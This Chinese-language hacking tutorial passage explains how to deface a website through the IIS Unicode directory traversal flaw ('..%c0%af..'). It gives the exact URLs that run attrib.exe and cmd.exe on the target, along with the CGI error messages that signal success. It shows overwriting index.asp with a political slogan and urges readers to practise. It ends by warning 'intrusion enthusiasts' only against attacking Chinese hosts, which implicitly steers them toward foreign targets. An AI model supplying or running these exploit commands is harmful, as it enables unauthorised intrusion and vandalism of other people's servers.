找到web页面所在目录后，就要判断一下是否有权修改对方网页文件。首先要确定文件是否可读写，用下面的命令来判断(假设主页文件所放路径为c:\inetpub\wwwroot\index.asp)：
http://x.x.x.x/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp

1.如果出现下面英文：
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
就是可以修改对方的网页了。

2.如果出现下面英文：
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
说明权限不够，还是放弃吧。

　　要修改目标主机的web文件，常用到的方法是利用echo回显以及管道工具“>”和“>>”。我们首先要确定文件是否可读写，我们用命令来试试：
http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+台湾是中国不可分割的一部分+> c:\inetpub\wwwroot\index.asp

当看到下面的提示时：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:

这就已经成功修改了目标主机的网页了！当在浏览器地址栏键入目标主机的网址，浏览该网站时，你会看到网页上有“台湾是中国不可分割的一部分”几个字，除此以外一片空白

　　当然你也可以把那几个字换成“您的网站有漏洞”，随你喜欢了！

　　没看懂？没关系，当初我也是看不明白类似的文章，但按文章上所说的去实践了以后，就慢慢的懂了——实践出真知！这话没错！当然，如果能做到理论与实践相结合那就更好了！要学习技术，理论联系实践是最好的方法和老师。最后，再次提醒各位入侵爱好者，一定不要入侵国内的主机，法律无情啊！